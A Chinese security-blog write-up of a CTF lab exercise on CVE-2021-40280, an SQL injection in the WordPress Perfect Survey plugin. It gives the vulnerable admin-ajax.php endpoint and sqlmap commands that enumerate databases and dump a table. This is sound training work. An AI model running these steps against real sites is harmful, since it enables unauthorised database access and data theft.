freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

【春秋云境】CVE-2021-40280靶场实战记录
2023-05-14 16:01:33
所属地 广东省

靶场介绍

WordPress是一个使用PHP语言开发的内容管理系统(CMS),它极大地简化了构建博客或网站的过程,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站(博客)。WordPress不仅为大量商业网站和博客提供支持,它也是创建电子商务商店的流行方式,例如可以创建商业网站、电子商务商店、作品集网站、论坛、社交网络等。在Plugin Perfect Survey存在sql注入漏洞

开启靶场

1684050129_646090d13e0583c873b8d.png!small?1684050130440

POC

/wp-admin/admin-ajax.php?action=get_question&question_id=1

解题步骤

访问以下:

http://eci-2ze95j4wqbzeqf5mb1vf.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1

1684050207_6460911f152a4bf15a05b.png!small?1684050208216

通过sqlmap自动化工具测试

Sqlmap -u “目标”

1684050146_646090e20627240cda2ff.png!small?1684050147412


查看所有数据库

Sqlmap -u “目标” --dbs

1684050229_6460913549e2725f86218.png!small?1684050230391

查看cms数据库中的表

Sqlmap -u “目标” -D cms --tables

1684050248_646091487919598085326.png!small?1684050249539

读取cms数据库flag表中的值

Sqlmap-u “目标”-D cms -T flag --dump

1684050318_6460918e420f378bb06f6.png!small?1684050319168

# 漏洞 # 渗透测试 # web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录